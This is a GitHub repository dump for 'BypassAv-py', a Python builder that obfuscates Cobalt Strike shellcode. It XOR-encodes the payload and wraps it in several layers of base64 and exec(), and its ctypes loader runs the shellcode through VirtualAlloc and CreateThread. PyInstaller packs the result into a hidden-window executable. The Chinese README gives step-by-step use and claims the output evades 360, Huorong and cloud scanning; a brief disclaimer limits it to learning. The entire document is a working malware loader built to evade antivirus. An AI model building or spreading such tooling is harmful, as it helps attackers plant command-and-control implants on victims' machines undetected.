├── Bypass.py ├── IMG ├── 11.png ├── 111.png ├── 360.png ├── cs.png ├── 云查杀.png ├── 火绒.png └── 生成payload.png ├── README.md └── i.ico /Bypass.py: -------------------------------------------------------------------------------- 1 | # 2023-07-25 f0ing 2 | import base64 3 | import ctypes 4 | import os 5 | import PyInstaller.__main__ 6 | import shutil 7 | 8 | #填入cs生成的pyshellcode 9 | originalShellcode = b"" 10 | encryptedShellcode = bytes([byte ^ 0xFF for byte in originalShellcode]) 11 | encodedShellcode = base64.b64encode(encryptedShellcode).decode('utf-8') 12 | encodedShellcode = str(base64.b64encode(encodedShellcode.encode('UTF-8')), 'UTF-8') 13 | 14 | loader=""" 15 | # 获取 kernel32.dll 模块的句柄 16 | kernel32 = ctypes.WinDLL('kernel32') 17 | kernel32.GetModuleHandleW.restype = ctypes.c_void_p 18 | module_handle = kernel32.GetModuleHandleW(None) 19 | # 定义 WinAPI 函数的参数和返回类型 20 | kernel32.VirtualAlloc.restype = ctypes.c_void_p 21 | kernel32.VirtualAlloc.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_ulong, ctypes.c_ulong] 22 | kernel32.CreateThread.restype = ctypes.c_void_p 23 | kernel32.CreateThread.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_ulong, ctypes.POINTER(ctypes.c_ulong)] 24 | kernel32.WaitForSingleObject.argtypes = [ctypes.c_void_p, ctypes.c_ulong] 25 | 26 | # 创建可写的内存缓冲区 27 | buffer = (ctypes.c_char * len(decrypted_shellcode)).from_buffer(decrypted_shellcode) 28 | 29 | # 使用 VirtualAlloc 在进程中分配内存 30 | mem = kernel32.VirtualAlloc(None, len(decrypted_shellcode), 0x1000 | 0x2000, 0x40) 31 | if not mem: 32 | raise Exception("VirtualAlloc 失败") 33 | 34 | # 将解密后的 shellcode 复制到分配的内存空间中 35 | ctypes.memmove(mem, buffer, len(decrypted_shellcode)) 36 | 37 | # 创建线程执行 shellcode 38 | thread_handle = kernel32.CreateThread(None, 0, mem, None, 0, ctypes.byref(ctypes.c_ulong())) 39 | 40 | # 等待线程执行完成 41 | kernel32.WaitForSingleObject(thread_handle, -1) 42 | 43 | """ 44 | Jiami = str(base64.b64encode(loader.encode('UTF-8')), 'UTF-8') 45 | for i in range(1,5): 46 | Jiami = str(base64.b64encode(Jiami.encode('UTF-8')), 'UTF-8') 47 | Decode=base64.b64decode(Jiami) 48 | for j in range(1,5): 49 | Decode=base64.b64decode(Decode) 50 | 51 | 52 | body=""" 53 | import ctypes 54 | import base64 55 | encrypted_shellcode = \"""" + encodedShellcode + '\"' + """ 56 | encrypted_shellcode=base64.b64decode(encrypted_shellcode) 57 | decoded_shellcode = base64.b64decode(encrypted_shellcode) 58 | 59 | decrypted_shellcode = bytearray(decoded_shellcode) 60 | Jiami=\"""" + Jiami+ '\"' + """ 61 | for i in range(len(decrypted_shellcode)): 62 | decrypted_shellcode[i] ^= 0xFF 63 | Decode=base64.b64decode(Jiami) 64 | for j in range(1,5): 65 | Decode=base64.b64decode(Decode) 66 | exec(Decode) 67 | 68 | """ 69 | Code = str(base64.b64encode(body.encode('UTF-8')), 'UTF-8') 70 | for i in range(1,6): 71 | Code = str(base64.b64encode(Code.encode('UTF-8')), 'UTF-8') 72 | 73 | file = open('ffctf.py', 'w',encoding="utf-8") 74 | 75 | 76 | file.write(""" 77 | 78 | import base64 79 | import ctypes 80 | 81 | zzzzz=0 82 | zzzzzz=\""""'' +Code+ '' """\" 83 | for zzzzz in range(6): 84 | zzzzzz=base64.b64decode(zzzzzz) 85 | fasdas=zzzzzz 86 | exec(zzzzzz) 87 | """) 88 | 89 | file.close() 90 | try: 91 | # 获取要打包的脚本路径 92 | script_file = "ffctf.py" 93 | # 获取 PyInstaller 路径 94 | pyinstaller_path = os.path.dirname(PyInstaller.__main__.__file__) 95 | # 设置打包选项 96 | build_args = [ 97 | "--onefile", # 生成一个单独的可执行文件 98 | "--noconsole", # 不显示命令行窗口 99 | "--name=ffctf", # 设置生成的可执行文件名 100 | script_file # 添加要打包的脚本路径 101 | ] 102 | # 执行打包命令 103 | PyInstaller.__main__.run(build_args) 104 | except: 105 | print("exe在dist文件夹内") 106 | # 删除 build 文件夹和.spec文件 107 | shutil.rmtree("./build") 108 | os.remove("./ffctf.spec") 109 | os.remove("./ffctf.py") 110 | -------------------------------------------------------------------------------- /IMG/11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffctf/BypassAv-py/408dd815091da7eb53c3506b714ed5fb9c2b723b/IMG/11.png -------------------------------------------------------------------------------- /IMG/111.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffctf/BypassAv-py/408dd815091da7eb53c3506b714ed5fb9c2b723b/IMG/111.png -------------------------------------------------------------------------------- /IMG/360.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffctf/BypassAv-py/408dd815091da7eb53c3506b714ed5fb9c2b723b/IMG/360.png -------------------------------------------------------------------------------- /IMG/cs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffctf/BypassAv-py/408dd815091da7eb53c3506b714ed5fb9c2b723b/IMG/cs.png -------------------------------------------------------------------------------- /IMG/云查杀.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffctf/BypassAv-py/408dd815091da7eb53c3506b714ed5fb9c2b723b/IMG/云查杀.png -------------------------------------------------------------------------------- /IMG/火绒.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffctf/BypassAv-py/408dd815091da7eb53c3506b714ed5fb9c2b723b/IMG/火绒.png -------------------------------------------------------------------------------- /IMG/生成payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffctf/BypassAv-py/408dd815091da7eb53c3506b714ed5fb9c2b723b/IMG/生成payload.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![socialify](https://socialify.git.ci/ffctf/BypassAv-py/image?description=1&font=Inter&forks=1&issues=1&language=1&logo=https%3A%2F%2Favatars.githubusercontent.com%2Fu%2F57828643%3Fv%3D4&owner=1&pattern=Charlie%20Brown&pulls=1&stargazers=1&theme=Dark) 2 | # BypassAv-py 3 | 4 | 免杀某60、火绒、PythonShellcode-loader 5 | 6 | ```2023.07.25测试可用``` 7 | 8 | 师傅们点点Star支持一下 9 | ## 更新日志: 10 | ```2023.07.25更新可过火绒和360云查杀等国内一家子``` 11 | 12 | ```2023.06.24更新可过火绒和360云查杀等国内一家子``` 13 | 14 | 15 | ```2023.06.18更新可过火绒和360云查杀等国内一家子``` 16 | ![360](https://github.com/ffctf/BypassAv-py/blob/main/IMG/11.png) 17 | ![360](https://github.com/ffctf/BypassAv-py/blob/main/IMG/111.png) 18 | 19 | 20 | ```2023.06.16测试可过火绒和360云查杀等国内一家子``` 21 | ![360](https://github.com/ffctf/BypassAv-py/blob/main/IMG/cs.png) 22 | 23 | 失效了记得提issues 24 | 25 | 声明:本工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。 26 | 27 | ## 0x01食用教程: 28 | 29 | 使用Cs生成Python shellcode ,把Use x64 payload 打上勾 30 | 31 | ![生成payload](https://github.com/ffctf/BypassAv-py/blob/main/IMG/%E7%94%9F%E6%88%90payload.png) 32 | 33 | 把生成的shellcode复制到Bypass.py内的第九行 34 | 35 | 运行脚本即可生成exe 36 | 37 | 38 | 39 | ![火绒](https://github.com/ffctf/BypassAv-py/blob/main/IMG/%E7%81%AB%E7%BB%92.png) 40 | ![360](https://github.com/ffctf/BypassAv-py/blob/main/IMG/360.png) 41 | ![360](https://github.com/ffctf/BypassAv-py/blob/main/IMG/%E4%BA%91%E6%9F%A5%E6%9D%80.png) 42 | 43 | -------------------------------------------------------------------------------- /i.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffctf/BypassAv-py/408dd815091da7eb53c3506b714ed5fb9c2b723b/i.ico --------------------------------------------------------------------------------